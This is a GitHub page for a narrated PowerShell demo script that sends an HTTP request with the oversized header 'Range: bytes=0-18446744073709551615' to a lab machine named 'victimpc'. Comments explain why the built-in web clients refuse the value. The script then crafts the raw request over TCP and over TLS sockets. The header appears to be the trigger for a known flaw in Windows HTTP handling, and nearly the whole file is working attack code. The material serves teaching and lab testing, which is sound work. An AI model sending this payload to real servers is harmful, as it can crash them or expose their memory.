This repository was archived by the owner on Mar 15, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathdemo.ps1
More file actions
106 lines (78 loc) · 3.27 KB
/
Copy pathdemo.ps1
File metadata and controls
106 lines (78 loc) · 3.27 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
<#
So let's just try doing a simple webrequest to begin with, as you can see, it works as expected
#>
Invoke-webrequest -Uri http://192.168.40.133
<#
Perhaps we could just use the headers parameter and specify the range?
#>
Invoke-webrequest -Uri http://192.168.40.133 -Headers @{'Range' = 'bytes=0-18446744073709551615'}
<#
Unfortunately, we recieve an error.
The error is telling us that we need to use the appropriate property to adjust the headers, but from invoke-webrequest,
there just isn't a way of doing so.
Well, we know that invoke-webrequest is just using the .net frameworks webrequest object under the covers, so let's just
use that then!
So let's create a web request, and just get a response from the server to check it works as we expect.
#>
$WR = [System.Net.WebRequest]::Create('http://192.168.40.133')
$wr.GetResponse()
<#
And much like before, we have successfully requested the page.
How about we try changing the range header via the headers property.
#>
$WR.Headers['Range'] = 'bytes=0-18446744073709551615'
<#
Once again an error, and this one is pretty much like what we saw before.
Let's try using the Add Range method
#>
$WR.AddRange(0, 18446744073709551615)
<#
And we get another error. This time, were are getting an error abou the value specified.
It is too large for an Int32 value. The issue is, the .Net framework has a bunch of rules,
and we are trying to violate those rules, and it just isn't going to let us.
The solution is to work at a lower level, HTTP is a TCP based protocol, instead of using these
HTTP clients, we need to use TCP connections and speak HTTP ourselves.
#>
#
clear-host
#Create out HTTP request
$HTTPRequest = "GET / HTTP/1.1`r`n"
$HTTPRequest += "Host: 192.168.40.133`r`n"
$HTTPRequest += "Range: bytes=0-18446744073709551615`r`n"
$HTTPRequest += "Connection: close`r`n"
$HTTPRequest += "`r`n"
#Create a TCPClient and connect to the specified computer on port 80
$TCPClient = New-Object -TypeName System.Net.Sockets.TcpClient
$TCPClient.Connect('192.168.40.133', 80)
#Setup the Streams
$TCPStream = $TCPClient.GetStream()
$TCPStreamWriter = New-Object -TypeName System.IO.StreamWriter -ArgumentList $TCPStream
$TCPStreamReader = New-Object -TypeName System.IO.StreamReader -ArgumentList $TCPStream
#Send our request
$TCPStreamWriter.Write($HTTPRequest)
$TCPStreamWriter.Flush()
#Read the response
$HTTPResponse = $TCPStreamReader.ReadToEnd()
# Close the client and stream
$TCPClient.Close()
$TCPStream.Close()
$HTTPResponse
#-----
clear-host
#Create a TCPClient and connect to specified computer on port 443
$TCPClient = New-Object -TypeName System.Net.Sockets.TcpClient
$TCPClient.Connect('192.168.40.133', 443)
#Setup the Streams
$SSLStream = New-Object -TypeName System.Net.Security.SslStream -ArgumentList ($TCPClient.GetStream())
$SSLStream.AuthenticateAsClient('victimpc')
$TCPStreamWriter = New-Object -TypeName System.IO.StreamWriter -ArgumentList $SSLStream
$TCPStreamReader = New-Object -TypeName System.IO.StreamReader -ArgumentList $SSLStream
#Send our request
$TCPStreamWriter.Write($HTTPRequest)
$TCPStreamWriter.Flush()
#Read the response
$HTTPResponse = $TCPStreamReader.ReadToEnd()
# Close the client and stream
$TCPClient.Close()
$SSLStream.Close()
$HTTPResponse